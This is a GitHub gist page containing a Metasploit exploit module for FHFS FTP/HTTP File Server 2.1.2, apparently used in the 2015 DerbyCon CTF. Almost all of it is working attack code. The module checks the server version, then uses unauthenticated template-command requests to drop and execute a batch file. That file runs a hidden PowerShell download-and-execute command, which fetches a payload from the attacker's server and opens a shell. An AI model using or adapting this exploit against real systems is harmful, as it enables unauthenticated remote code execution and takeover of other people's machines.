Created
October 10, 2015 21:40
-
-
Save ztgrace/2ffe08e16c376b3b56de to your computer and use it in GitHub Desktop.
PoC exploit used by the Cult of the Glowing Rectangle at the 2015 DerbyCon CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpClient | |
include Msf::Exploit::Remote::HttpServer | |
include Msf::Exploit::Powershell | |
#include Msf::Exploit::FileDropper | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "FHFS - FTP/HTTP File Server 2.1.2", | |
'Description' => %q{ | |
FHFS FTP/HTTP File Server (FHFS) is vulnerable to a remote command execution attack. | |
The exec command allows for unauthenticated command execution on the host system. | |
However, testing idicated that it failed to process anything other than a base command. | |
This module combines the exec and save commands to achieve arbitrary code execution using | |
powershell. Note: due to the way the server processes commands, this module should spawn | |
two shells. | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => | |
[ | |
'Naser Farhadi', # Original Exploit Author | |
'Zach Grace @ztgrace', # metasploit author | |
'Trenton Ivey @TrentonIvey', # metasploit author | |
], | |
'References' => | |
[ | |
['URL', 'https://www.exploit-db.com/exploits/37985/'], | |
['URL', 'https://warroom.securestate.com/index.php/tag/fhfs/'], | |
], | |
'Payload' => { 'BadChars' => "\x0d\x0a\x00\x20" }, | |
'Space' => 2014, | |
'Platform' => 'win', | |
'Targets' => | |
[ | |
[ 'Automatic', {} ], | |
], | |
'Privileged' => true, | |
'Stance' => Msf::Exploit::Stance::Aggressive, | |
'DisclosureDate' => "Aug 27 2015", | |
'DefaultTarget' => 0)) | |
register_options( | |
[ | |
OptString.new('TARGETURI', [true, 'The path of the web application', '/']), | |
OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 30]), | |
], self.class) | |
end | |
def check | |
res = send_request_raw({ | |
'method' => 'GET', | |
'uri' => '/' | |
}) | |
if res && res.headers['Server'] && res.headers['Server'] =~ /FHFS - FTP\/HTTP File Server - v([\d.]+)/ | |
version = $1 | |
print_status("FHFS version: #{version}") | |
if version == "2.1.2" | |
return Exploit::CheckCode::Vulnerable | |
else | |
return Exploit::CheckCode::Safe | |
end | |
end | |
end | |
def on_request_uri(cli, req) | |
print_status("#{peer} - Payload request received: #{req.uri}") | |
data = cmd_psh_payload( | |
payload.encoded, | |
payload_instance.arch.first, | |
remove_comspec: true, | |
use_single_quotes: true | |
) | |
send_response(cli, data, 'Content-Type' => 'application/octet-stream') | |
end | |
def psh_cmd | |
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl | |
download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{get_uri}'))" | |
cmd = generate_psh_command_line( | |
noprofile: true, | |
windowstyle: 'hidden', | |
command: download_and_run | |
) | |
print_status("Command to execute: #{cmd}") | |
return cmd | |
end | |
def primer | |
file_name = rand_text_alpha(10) | |
file_name << ".bat" | |
batch_path = "C:\\Windows\\Temp\\#{file_name}" | |
cmd = psh_cmd | |
payloads = [ | |
"/?{.save|#{batch_path}|{.decodeuri|#{URI::escape(cmd)}.}.}", # dropper | |
"/?{.exec|#{batch_path}.}", # command execution | |
"/?{.delete|#{batch_path}.}", | |
] | |
payloads.each do |payload| | |
if datastore['VERBOSE'] | |
print_status("Sending payload: #{payload}") | |
end | |
send_request_raw({ | |
'method' => 'GET', | |
'uri' => payload, | |
'timeout' => 20, | |
}) | |
sleep 2 | |
end | |
end | |
def exploit | |
begin | |
Timeout.timeout(datastore['HTTPDELAY']) { super } | |
rescue Timeout::Error | |
# When the server stops due to our timeout, this is raised | |
end | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment